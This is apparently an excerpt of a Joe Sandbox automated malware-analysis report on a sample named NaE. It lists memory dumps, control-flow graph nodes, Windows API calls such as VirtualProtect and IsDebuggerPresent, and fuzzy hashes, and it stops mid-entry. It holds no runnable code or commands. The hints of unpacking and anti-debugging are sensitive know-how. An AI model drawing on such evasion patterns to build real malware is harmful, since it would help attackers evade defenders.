                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                      • API String ID: 2366190142-2962942730
                                                      • Opcode ID: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                      • Opcode Fuzzy Hash: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 165 401991 call 401030 164->165 165->162
                                                      APIs
                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                      • GetLastError.KERNEL32 ref: 00401940
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                      • String ID:
                                                      • API String ID: 3322701435-0
                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                      APIs
                                                      • _malloc.LIBCMT ref: 0040AF80
                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1411284514-0
                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 188 2219378-22193f9 VirtualProtect 191 2219402-2219427 188->191 192 22193fb-2219401 188->192 192->191
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022193EC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1460105468.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2210000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: c47d66474298f7e4d978c403ca2aca8e7395b353cfc02538e566a043db84a7bd
                                                      • Instruction ID: 729cbd5943fc968433636a2fab3a201e96927928943cc4289b05134b74b68f9c
                                                      • Opcode Fuzzy Hash: c47d66474298f7e4d978c403ca2aca8e7395b353cfc02538e566a043db84a7bd
                                                      • Instruction Fuzzy Hash: 6211F4B19002499FDB10DFAAC885BDFFBF4AF48210F14842AE419A7250C775A941CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 196 2219548-22195b7 FindCloseChangeNotification 199 22195c0-22195e5 196->199 200 22195b9-22195bf 196->200 200->199
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE ref: 022195AA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1460105468.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2210000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 537f841dfd8137d5337831d30400593e4d482c1e3ac56c8d4fce3ad7c20592e6
                                                      • Instruction ID: 1a9c6e3a1b6281ec68ac4dcfd7cdeaf7d9da9c9a1f742decb028ae850549abe9
                                                      • Opcode Fuzzy Hash: 537f841dfd8137d5337831d30400593e4d482c1e3ac56c8d4fce3ad7c20592e6
                                                      • Instruction Fuzzy Hash: 4A113AB1D003498FDB10DFAAC4457DFFBF4AF88214F14841AD419A7240C775A944CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 204 401870-401883 call 40af66 207 4018b2 204->207 208 401885-4018a2 SysAllocString 204->208 209 4018b4-4018b8 207->209 208->209 210 4018a4-4018a6 208->210 212 4018c4-4018c9 209->212 213 4018ba-4018bf call 40ad90 209->213 210->209 211 4018a8-4018ad call 40ad90 210->211 211->207 213->212
                                                      APIs
                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: AllocString_malloc
                                                      • String ID:
                                                      • API String ID: 959018026-0
                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                      • Basic blocks: 40d534-40d556 (calls HeapCreate), 40d558-40d559, 40d55a-40d563
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: CreateHeap
                                                      • String ID:
                                                      • API String ID: 10892065-0
                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                      • Basic blocks: 70d4d8-70d4ea through 70d5b6 (node IDs 513-528; no imported API calls in this region)
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9eadab77dea37ecae685c8f42011754f9f031cf0b22eec0ddae01bb8ee2af5d2
                                                      • Instruction ID: 54f267cefe182dcebdf85d809814494e5235266a5d90015e60cd701a1533a204
                                                      • Opcode Fuzzy Hash: 9eadab77dea37ecae685c8f42011754f9f031cf0b22eec0ddae01bb8ee2af5d2
                                                      • Instruction Fuzzy Hash: 7F212B71504340DFDB14DF94D9C0B16BBE5FB94318F208269ED054B296C33ADC66C7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                      • Basic blocks: 70d5c4-70d5d6 through 70d6a2 (node IDs 530-545; no imported API calls in this region)
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 698e25882d5509a51a8235099d413cbb2076d6bad82102118b3a0a8d5c3fd733
                                                      • Instruction ID: 54f29646a8f844f60d939e40bc638ecaa826c13b67d9a22638b52db193cdb96d
                                                      • Opcode Fuzzy Hash: 698e25882d5509a51a8235099d413cbb2076d6bad82102118b3a0a8d5c3fd733
                                                      • Instruction Fuzzy Hash: 6A2128B1504340DFDB24DF90D9C0B16BBE5FB84314F24C669E8090B286C33ADC56CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: c4fb2a2f1ed7051c778c77b9a38fa06eefc93cbb3ade5c74bc2229abcad3ba26
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: CF11B176504340CFCB15CF54D9C4B16BFB2FB94328F2486A9DC090B656C33AD86ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: d873c6b8369d686900ddc0e4b057b138644dba0c34133e181294cd467e2a9759
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: C211E676504380CFCB15CF50D5C4B16BFB2FB94314F24C6A9D8490B656C33AD85ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 721c53e280033e4d434882037e2a4d9401111bfba7ee9ad0b605c35bbb20b20b
                                                      • Instruction ID: 5a26888d393a0caed046da844123a773dddad7f9f67814a8392029740de78fc2
                                                      • Opcode Fuzzy Hash: 721c53e280033e4d434882037e2a4d9401111bfba7ee9ad0b605c35bbb20b20b
                                                      • Instruction Fuzzy Hash: 5901A271509340EBE7308AA5C984B67BBD8EF81724F18C61AED4D4A2C2C37D9C45CAB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9163ef1ca01d55e4fe53b353fb4c365700091e10de71edfc696b67fb482f4691
                                                      • Instruction ID: 7293911b267d11422889d3264d4e42edd73108d91e80b65addc1b1cb0b4e3fb3
                                                      • Opcode Fuzzy Hash: 9163ef1ca01d55e4fe53b353fb4c365700091e10de71edfc696b67fb482f4691
                                                      • Instruction Fuzzy Hash: 5BF06D72409344EFE7208E16C988B66FBD8EB91734F18C55AED8C4A2C7C2799C45CAB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID:
                                                      • API String ID: 2579439406-0
                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$PA
                                                      • API String ID: 0-3039612711
                                                      • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                      • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                      • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                      • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                      • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                      • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                      • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                      • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                      • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                      • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                      • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                      • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                      • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                      • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                      • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                      • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
